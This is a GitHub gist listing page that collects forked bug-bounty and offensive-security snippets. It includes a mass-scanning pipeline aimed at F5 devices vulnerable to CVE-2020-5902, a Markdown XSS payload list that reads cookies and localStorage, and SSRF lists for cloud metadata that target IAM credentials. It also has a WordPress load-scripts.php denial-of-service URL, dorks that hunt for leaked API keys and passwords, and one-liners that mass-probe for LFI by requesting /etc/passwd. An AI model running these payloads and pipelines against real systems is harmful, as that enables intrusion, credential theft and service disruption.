Skip to content

Instantly share code, notes, and snippets.

View hunter0x8's full-sized avatar

Muhammad Ahsan hunter0x8

54 followers · 297 following
View GitHub Profile
@hunter0x8
hunter0x8 / f5_here_i_come.sh
Created July 7, 2020 16:02 — forked from LuD1161/f5_here_i_come.sh
F5 Slapdash attempt
# Get all the F5 IPs from Shodan | Get script here : https://gist.github.com/LuD1161/2087aea80e8771a4af069c33b4078570
python3 shodan_query.py "http.favicon.hash:-335242539" results_f5.txt | tee -a output.txt
cat output.txt | grep -i "host :" | cut -d":" -f2 | cut -d" " -f2 | httpx -threads 400 -ports 80,443,8443,4443 -silent | nuclei -t cves/CVE-2020-5902.yaml -o results.txt
cut -d" " -f3 results.txt > targets.txt
sed -i -e "s/\.\;/\.\\\;/g" targets.txt # escape semicolon to pass to interlace
interlace -tL ./targets.txt -threads 100 -c "echo _target_; curl --insecure -v _target_ 2>&1 | awk 'BEGIN { cert=0 } /^\* SSL connection/ { cert=1 } /^\*/ { if (cert) print }'" -v | tee -a all_certs.txt
@hunter0x8
hunter0x8 / DutchGov.txt
Created July 25, 2020 06:12 — forked from random-robbie/DutchGov.txt
Dutch Gov - bug bounty scope - feel free to add more if you know they are in scope
0800-8051.nl
0900-8844.nl
09008844.nl
112test.nl
1813-2013.nl
1meter35.nl
2013russiaholland.nl
247bz.nl
8000488.nl
8007000.nl
@hunter0x8
hunter0x8 / gist:3c9d0bef4c28abfa522f966fdd4e5097
Created August 8, 2020 04:59 — forked from yassineaboukir/gist:726992bd1f0a4eb637d150b7b5c66079
List of reserved names to blacklist from registration/username claim for security reasons and RFC compliance
abuse
admin
administrator
ftp
hostmaster
info
is
it
list
list-request
@hunter0x8
hunter0x8 / List of API endpoints & objects
Created August 8, 2020 05:00 — forked from yassineaboukir/List of API endpoints & objects
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
@hunter0x8
hunter0x8 / github-recon
Created August 8, 2020 05:06 — forked from yassineaboukir/github-recon
“Hackme.tld” API_key
“Hackme.tld” secret_key
“Hackme.tld” aws_key
“Hackme.tld” Password 
“Hackme.tld” FTP
“Hackme.tld” login
“Hackme.tld” github_token
“Hackme.tld” http:// & https://  
“Hackme.tld” amazonaws
“Hackme.tld” digitaloceanspaces
@hunter0x8
hunter0x8 / Markdown XSS fuzzlist
Created August 8, 2020 05:06 — forked from yassineaboukir/Markdown XSS fuzzlist
Source: https://github.com/JakobRPennington/InformationSecurity/tree/master/Payloads/md
[Basic](javascript:alert('Basic'))
[Local Storage](javascript:alert(JSON.stringify(localStorage)))
[CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive'))
[URL](javascript://www.google.com%0Aalert('URL'))
[In Quotes]('javascript:alert("InQuotes")')
![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad'))
![Escape SRC - onerror]("onerror="alert('ImageOnError'))
[XSS](javascript:prompt(document.cookie))
[XSS](j a v a s c r i p t:prompt(document.cookie))
[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
@hunter0x8
hunter0x8 / cloud_metadata.txt
Created August 12, 2020 06:32 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@hunter0x8
hunter0x8 / loadsxploit
Created August 13, 2020 20:44 — forked from remonsec/loadsxploit
This is the Full URL to exploit /wp-admin/load-scripts.php
/wp-admin/load-scripts.php?load=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-se
@hunter0x8
hunter0x8 / dorks.txt
Created August 15, 2020 09:36 — forked from abdelhady360/dorks.txt
List of Google Dorks for sites that have responsible disclosure program / bug bounty program
inurl /bug bounty
inurl : / security
inurl:security.txt
inurl:security "reward"
inurl : /responsible disclosure
inurl : /responsible-disclosure/ reward
inurl : / responsible-disclosure/ swag
inurl : / responsible-disclosure/ bounty
inurl:'/responsible disclosure' hoodie
responsible disclosure swag r=h:com
@hunter0x8
hunter0x8 / bash_aliases.sh
Created August 18, 2020 06:06 — forked from dwisiswant0/bash_aliases.sh
One-liner to get Open-redirect & LFI
lfi() {
gau $1 | gf lfi | qsreplace "/etc/passwd" | xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
}
open-redirect() {
local LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
}